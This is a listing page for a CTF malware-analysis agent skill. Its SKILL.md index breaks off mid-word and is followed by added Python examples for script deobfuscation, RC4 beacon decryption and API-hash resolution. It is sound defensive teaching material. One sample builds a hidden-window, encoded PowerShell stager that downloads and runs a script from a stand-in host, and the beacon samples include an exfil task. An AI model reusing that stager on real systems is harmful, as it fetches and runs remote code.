
Ctf Malware
Analyze obfuscated malware, C2 traffic, and binaries in CTF-style challenges using YARA, Volatility, and common RE tooling workflows.
Overview
CTF Malware is an agent skill for the Ship phase that provides malware analysis and network-traffic techniques for CTF and lab-style reverse-engineering tasks.
Install
npx skills add https://github.com/ljagiello/ctf-skills --skill ctf-malware
What is this skill?
- Covers obfuscated scripts, malicious packages, custom crypto protocols, C2 traffic, PE/.NET binaries, and RC4/AES encrypted communications
- Volatility-oriented memory forensics: malfind, process injection detection
- Anti-analysis topics: VM/sandbox detection, timing evasion, API hashing, environment checks
- Documented Python and OS package prerequisites plus optional dnSpy for .NET on Windows
- Supporting files deep-link to each technique; SKILL.md is positioned as a quick one-liner index into the fuller playbooks
Adoption & trust: 4.2k installs on skills.sh; 2.3k GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You are staring at obfuscated malware, encrypted C2, or a suspicious binary in a challenge and need a repeatable analysis path instead of random tool guesses.
Who is it for?
CTF competitors and indie security learners analyzing challenge artifacts in a controlled lab with bash, Python 3, and permission to install analysis tools.
Skip if: Routine production monitoring for a typical indie SaaS, or anyone analyzing live systems without authorization and isolation.
When should I use this skill?
Analyzing obfuscated scripts, malicious packages, custom crypto protocols, C2 traffic, PE/.NET binaries, RC4/AES encrypted communications, YARA rules, shellcode, memory forensics, or anti-analysis techniques in CTF contexts.
What do I get? / Deliverables
You follow indexed techniques to deobfuscate, dissect traffic, run memory forensics, and extract configurations and indicators of compromise with the listed toolchains.
- Extracted malware configuration and indicators of compromise
- Documented analysis steps aligned to challenge artifacts
- YARA or traffic dissection notes as required by the task
How it compares
CTF-oriented malware playbook with install manifests—not a generic OWASP app scanner or dependency-only SCA skill.
Common Questions / FAQ
Who is ctf-malware for?
Players and security-focused builders using filesystem-based agents (Claude Code-style) on malware CTF challenges, forensic puzzles, or authorized lab samples.
When should I use ctf-malware?
During Ship security-style investigations when scripts are obfuscated, traffic looks like C2, binaries need PE/.NET or shellcode analysis, or memory images need Volatility malfind-style checks.
Is ctf-malware safe to install?
The skill requires bash, network access, and WebFetch in order to install tools. Use it only in an isolated environment, review the Security Audits panel before installing, and never run unknown payloads on your main machine.
SKILL.md
# CTF Malware & Network Analysis

Quick reference for malware analysis CTF challenges. Each technique has a one-liner here; see supporting files for full details with code.

## Prerequisites

**Python packages (all platforms):**

```bash
pip install yara-python pefile capstone oletools unicorn pycryptodome \
  volatility3 dissect.cobaltstrike
```

**Linux (apt):**

```bash
apt install strace ltrace tshark binwalk binutils
```

**macOS (Homebrew):**

```bash
brew install wireshark binwalk binutils ghidra
```

**Manual install:**

- dnSpy — [GitHub](https://github.com/dnSpy/dnSpy), .NET decompiler (Windows)

## Additional Resources

- [scripts-and-obfuscation.md](scripts-and-obfuscation.md) - JavaScript deobfuscation, PowerShell analysis, eval/base64 decoding, junk code detection, hex payloads, Debian package analysis, dynamic analysis techniques (strace/ltrace, network monitoring, memory string extraction, automated sandbox execution), YARA rules for malware detection, shellcode analysis (Unicorn Engine, Capstone), memory forensics for malware (Volatility 3 malfind, process injection detection), anti-analysis techniques (VM detection, timing evasion, API hashing, process injection), trojanized plugin analysis with custom alphabet C2 decoding
- [c2-and-protocols.md](c2-and-protocols.md) - C2 traffic patterns, custom crypto protocols, RC4 WebSocket, DNS-based C2, network indicators, PCAP analysis, AES-CBC, encryption ID, Telegram bot recovery, Poison Ivy RAT Camellia decryption
- [pe-and-dotnet.md](pe-and-dotnet.md) - PE analysis (peframe, pe-sieve, pestudio), .NET analysis (dnSpy, AsmResolver), LimeRAT extraction, sandbox evasion, malware config extraction, PyInstaller+PyArmor

---

## When to Pivot

- If the sample is really just a normal crackme, packed challenge binary, or custom VM with no malware behavior, switch to `/ctf-reverse`.
- If the main job is network reconstruction, disk carving, or host artifact recovery, switch to `/ctf-forensics`.
- If the challenge turns into public attribution or infrastructure tracing, switch to `/ctf-osint`.

## Quick Start Commands

```bash
# Static analysis
file suspicious_file
strings -n 8 suspicious_file | head -50
xxd suspicious_file | head -20

# PE analysis
python3 -c "import pefile; pe=pefile.PE('mal.exe'); print(pe.dump_info())" | head
peframe mal.exe

# Dynamic analysis (sandboxed!)
strace -f -s 200 ./suspicious 2>&1 | head -100
ltrace ./suspicious 2>&1 | head -50

# Network indicators
strings suspicious_file | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
strings suspicious_file | grep -iE 'http|ftp|ws://'

# YARA scan
yara -r rules.yar suspicious_file
```

## Obfuscated Scripts

- Replace `eval`/`bash` with `echo` to print underlying code; extract base64/hex blobs and analyze with `file`. See [scripts-and-obfuscation.md](scripts-and-obfuscation.md).

## JavaScript & PowerShell Deobfuscation

- JS: Replace `eval` with `console.log`, decode `unescape()`, `atob()`, `String.fromCharCode()`.
- PowerShell: Decode `-enc` base64, replace `IEX` with output. See [scripts-and-obfuscation.md](scripts-and-obfuscation.md).

## Junk Code Detection

- NOP sleds, push/pop pairs, dead writ
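The "Obfuscated Scripts" and "JavaScript & PowerShell Deobfuscation" one-liners above describe a loop: decode the outer layer, swap the execution sink for an output sink, pull out the next blob, repeat. The following is an added example of that loop in Python; it is not code from the ctf-skills repository. The three-stage PowerShell stager it works on is constructed inside the block (the `-EncodedCommand` wrapper, the embedded base64 stage and the `198.51.100.23` URL are all made up for the example), so it runs offline.

```python
"""Peel layered script obfuscation: PowerShell -EncodedCommand (base64 of UTF-16LE),
nested base64/hex blobs inside the decoded script, and JavaScript
String.fromCharCode() literals. The sample stager below is constructed for this example."""
import base64
import binascii
import json
import re

B64_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")           # long base64 runs only
HEX_RE = re.compile(r"(?:[0-9A-Fa-f]{2}){8,}")              # 16+ hex chars, even length
URL_RE = re.compile(r"(?:https?|ftp|wss?)://[^\s'\"<>)]+", re.I)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?\b")


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or whitespace."""
    if not data:
        return 0.0
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / len(data)


def decode_powershell_enc(cmdline: str):
    """Return the script behind -e/-ec/-enc/-EncodedCommand, or None if absent."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def peel(blob: str, max_depth: int = 8):
    """Decode hex/base64 repeatedly while the result is still text. Returns the
    layers found; a final bytes entry means a binary payload (hand it to `file`,
    pefile or a disassembler instead)."""
    layers, cur = [], blob
    for _ in range(max_depth):
        if HEX_RE.fullmatch(cur):
            nxt = binascii.unhexlify(cur)
        elif B64_RE.fullmatch(cur) and len(cur) % 4 == 0:
            nxt = base64.b64decode(cur)
        else:
            break
        if printable_ratio(nxt) < 0.9:
            layers.append(nxt)
            break
        cur = nxt.decode("latin-1")
        layers.append(cur)
    return layers


def extract_blobs(script: str):
    """Hex/base64 blobs embedded in a script, longest first."""
    found = set(HEX_RE.findall(script)) | set(B64_RE.findall(script))
    return sorted(found, key=len, reverse=True)


def neutralize(script: str) -> str:
    """Swap execution sinks for output sinks (eval -> console.log, IEX -> Write-Output)
    so a layer can be executed to print the next one instead of running it."""
    script = re.sub(r"\beval\s*\(", "console.log(", script)
    return re.sub(r"\b(?:IEX|Invoke-Expression)\b", "Write-Output", script, flags=re.I)


def resolve_fromcharcode(js: str) -> str:
    """Replace String.fromCharCode(...) with the string literal it builds."""
    def repl(m):
        codes = [int(x) for x in re.findall(r"\d+", m.group(1))]
        return json.dumps("".join(map(chr, codes)))   # valid JS string literal
    return re.sub(r"String\.fromCharCode\(([\d,\s]*)\)", repl, js)


def deobfuscate(cmdline: str):
    """-enc decode, then peel every embedded blob recursively; return (stages, iocs)."""
    first = decode_powershell_enc(cmdline) or cmdline
    stages, queue, seen = [first], [first], {first}
    while queue:
        for blob in extract_blobs(queue.pop()):
            for layer in peel(blob):
                if isinstance(layer, str) and layer not in seen:
                    seen.add(layer)
                    stages.append(layer)
                    queue.append(layer)
    iocs = set()
    for s in stages:
        iocs.update(URL_RE.findall(s))
        iocs.update(IP_RE.findall(s))
    return stages, sorted(iocs)


# Constructed three-stage sample (not real malware): -EncodedCommand -> base64 -> URL.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23:8443/gate.ps1')"
STAGE1 = ("$p=[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('"
          + base64.b64encode(STAGE2.encode()).decode() + "'));IEX $p")
SAMPLE_CMDLINE = ("powershell.exe -nop -w hidden -EncodedCommand "
                  + base64.b64encode(STAGE1.encode("utf-16-le")).decode())

if __name__ == "__main__":
    stages, iocs = deobfuscate(SAMPLE_CMDLINE)
    for n, s in enumerate(stages, 1):
        print(f"[stage {n}] {neutralize(s)}")
    print("IOCs:", iocs)
```

`peel()` stops as soon as a layer is not mostly printable, because that is the point where the page's advice changes from "decode again" to "run `file` on it": the bytes are returned untouched rather than mangled into text.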
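The feature list and the c2-and-protocols.md summary both mention RC4-encrypted C2 communications and network indicators. As an added example (not code from the ctf-skills repository), the block below implements RC4 in pure Python, recovers the key by trying candidate strings the way one would feed `strings` output to a decryptor, parses the beacon configuration, and then shows the keystream-reuse shortcut that works even without the key when the malware encrypts every beacon with the same key and no nonce. The key, the "strings" list and both beacons are constructed for the example; the beacons are produced by the block's own `rc4()` call.

```python
"""RC4-wrapped C2 beacons: recover the key from `strings` candidates, decode the
config, and exploit keystream reuse across beacons. All sample data below is
constructed for this example (not real traffic)."""
import json


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encrypt and decrypt are the same call."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                          # pseudo-random generation + XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def looks_like_text(data: bytes, threshold: float = 0.95) -> bool:
    """Cheap plaintext oracle: mostly printable ASCII / whitespace."""
    if not data:
        return False
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / len(data) >= threshold


def crack_beacon(ciphertext: bytes, candidates):
    """Try each candidate key (e.g. every line of `strings -n 6 sample`) and
    return (key, plaintext) for the first one whose output looks like text."""
    for key in candidates:
        pt = rc4(key, ciphertext)
        if looks_like_text(pt):
            return key, pt
    return None, None


def extract_config(plaintext: bytes) -> dict:
    """Parse a JSON beacon body and derive the host:port indicator from it."""
    cfg = json.loads(plaintext)
    cfg["ioc"] = f'{cfg["c2"]}:{cfg["port"]}'
    return cfg


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """RC4 is a stream cipher: C ^ P gives the keystream for those positions."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))


def apply_keystream(ciphertext: bytes, keystream: bytes) -> bytes:
    """Decrypt another message that reused the same keystream (same key, no
    nonce) without ever learning the key; only the overlapping prefix is recovered."""
    return bytes(c ^ k for c, k in zip(ciphertext, keystream))


# Constructed sample: the key hides among the binary's strings; two beacons share it.
KEY = b"s3cr3t_k3y"
STRINGS_FROM_SAMPLE = [b"kernel32.dll", b"GetProcAddress", b"Mozilla/5.0", KEY, b"/gate.php"]
PLAIN_1 = b'{"id":"WIN-7F3A","c2":"198.51.100.23","port":8443,"sleep":30,"task":"checkin"}'
PLAIN_2 = b'{"id":"WIN-7F3A","c2":"198.51.100.23","port":8443,"task":"exfil"}'
BEACON_1 = rc4(KEY, PLAIN_1)
BEACON_2 = rc4(KEY, PLAIN_2)

if __name__ == "__main__":
    key, pt = crack_beacon(BEACON_1, STRINGS_FROM_SAMPLE)
    print("key:", key, "config:", extract_config(pt))
    ks = recover_keystream(BEACON_1, PLAIN_1)
    print("beacon 2 via keystream reuse:", apply_keystream(BEACON_2, ks))
```

The printable-ratio oracle is what makes blind key trials practical: a wrong RC4 key yields near-uniform bytes, so a 95 % printable threshold almost never accepts a false positive on a beacon of realistic length. In a real challenge, swap `STRINGS_FROM_SAMPLE` for the actual `strings` output and `BEACON_1` for the TCP payload carved from the PCAP.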
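API hashing, listed above under anti-analysis techniques, hides which Windows APIs shellcode calls by storing 32-bit hashes of their names instead of strings. Reversing it is a dictionary attack: hash every export name you know and look the shellcode's constants up. The block below is an added example, not code from the ctf-skills repository. It assumes the ROR13 scheme used by Metasploit-style `block_api` stubs (module name upper-cased as UTF-16LE including its terminator, function name as ASCII including its terminator, hashes summed); the export list and the hash blob are constructed here, where a real run would read exports from the DLLs with pefile.

```python
"""Resolve hashed imports: hash every known export name with the same ROR13
scheme the shellcode uses and match the constants it carries. The scheme is
assumed to follow Metasploit-style block_api stubs; the export list and the
hash blob are constructed for this example."""
import struct


def ror13_hash(data: bytes) -> int:
    """hash = ror32(hash, 13) + byte, applied to every byte including the terminator."""
    h = 0
    for b in data:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + b) & 0xFFFFFFFF
    return h


def api_hash(module: str, function: str) -> int:
    """Module name upper-cased as UTF-16LE with its null terminator, function name
    as ASCII with its null terminator; the two hashes are summed (assumed scheme)."""
    mod = ror13_hash((module.upper() + "\x00").encode("utf-16-le"))
    fun = ror13_hash((function + "\x00").encode("ascii"))
    return (mod + fun) & 0xFFFFFFFF


def build_table(exports: dict) -> dict:
    """hash -> 'module!function' for every export you know about."""
    return {api_hash(m, f): f"{m}!{f}" for m, funcs in exports.items() for f in funcs}


def resolve_hashes(blob: bytes, table: dict):
    """Walk a blob of little-endian DWORDs (how stagers store them) and name each one."""
    return [table.get(h, f"unknown:{h:#010x}")
            for (h,) in struct.iter_unpack("<I", blob)]


# Constructed export list; a real job would read it from the DLLs with pefile.
EXPORTS = {
    "kernel32.dll": ["LoadLibraryA", "GetProcAddress", "VirtualAlloc", "WinExec", "ExitProcess"],
    "ws2_32.dll": ["WSAStartup", "WSASocketA", "connect"],
}
TABLE = build_table(EXPORTS)

# Constructed hash blob, in the order a reverse-shell stager would consume them;
# the last value is deliberately unknown to show the miss path.
SHELLCODE_HASHES = struct.pack("<4I",
                               api_hash("ws2_32.dll", "WSAStartup"),
                               api_hash("ws2_32.dll", "connect"),
                               api_hash("kernel32.dll", "VirtualAlloc"),
                               0xDEADBEEF)

if __name__ == "__main__":
    for name in resolve_hashes(SHELLCODE_HASHES, TABLE):
        print(name)
```

If nothing resolves, the sample is using a different hash (a different rotate count, CRC32, FNV-1a, or a per-sample XOR key); pull the hashing loop out of the disassembly, port it into `ror13_hash`, and rebuild the table rather than guessing names.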